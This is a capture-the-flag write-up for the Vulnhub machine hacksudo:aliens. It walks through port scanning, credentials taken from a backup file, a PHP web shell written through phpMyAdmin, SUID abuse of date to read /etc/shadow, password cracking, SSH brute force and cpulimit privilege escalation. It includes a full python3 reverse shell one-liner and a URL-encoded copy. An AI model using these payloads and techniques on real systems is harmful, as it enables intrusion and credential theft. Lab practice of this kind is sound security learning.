Vulnhub hacksudo: aliens writeup

This is the write-up for hacksudo:aliens. The CTF machine is available for download here. Vishal Waghmare is the creator of this CTF.

Let’s begin with the nmap scan, to discover open ports. The target IP for me is Command: sudo nmap -p-

open ports

Targeted nmap scan for ports 22,80 and 9000. Command used: sudo nmap -sV -sC -p22,80,9000

Targeted nmap scan showing phpMyAdmin on port 9000

Directory enumeration on port 80 using gobuster.

gobuster dir — url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25

/backup interesting directory
mysql.bak file.

Lets download mysql.bak file.We got some credentials.

database credentials

As previous nmap scan shows phpMyAdmin is running on port 9000, used above creds which lets me login.

login into the phpMyAdmin port 9000

Navigating to mysql — ->users database able to see few users and their password hash.

users and password hash

So available users are root,phpmyadmin,shovon,hacksudo and vishal.

I spent good amount of time to get shell access on this box using phpmyadmin web console, then I found the good article here. As per the article I followed below steps.

  1. Clicked on new. Create a new database.I named it as shell_it.
new shell_it database.

2. Now click on shell it and we need to use SQL as to write file.

writting my_shell.php to /var/www/html

3. Click on GO and execute the query.The message shows that the query is successful.

4. Now visit the URL;hostname. We got command execution on the box.

Command execution

Time to get the reverse shell.

  1. Found the python reverse shell payload here. The box has python3 installed on it. Used below payload after URL encode
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%39%2e%33%22%2c%34%34%35%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27

2. Start netcat listener on port 443 on kali machine.

URL + payload to get reverse shell

3. Reverse shell on port 443.

Reverse Shell

Don’t have enough permission as we are www-data user. Basic enumeration using find command to find suid binaries. date has suid set.

date with suid permission.

Privilege escalation to user hacksudo.

As per gtfobins, we can read files if suid is set for date binary.

Tried to read the /etc/shadow file. Got the hash for the user hacksuod. Cracked it using john.

  1. created a variable my_shadow with value “/etc/shadow”.
  2. used /usr/bin/date -f $my_shadow to read hashes.
root hash
hacksudo hash

3. Copied the hacksudo hash into a file and used john to crack it with wordlist rockyou.txt.

cracked hacksudo hash

Login as user hacksudo.

SSH login with user hacksudo

User Flag

user flag

We can read the .bash_history file a basic enumeration. We can see the command cpulimit is used with /bin/bash -p as argument. Find also shows that it has a suid bit set. Lets use it to escalate the privilege to root.

Root on hacksudo alien

There is another method to get user hacksuod on the box. As we discovered root,phpmyadmin,shovon,hacksudo and vishal users through phpMyAdmin console. In the background I used hydra to brute-force ssh login with users and got successful as hacksudo.

Tool Used:

  1. nmap
  2. hydra
  3. curl
  4. john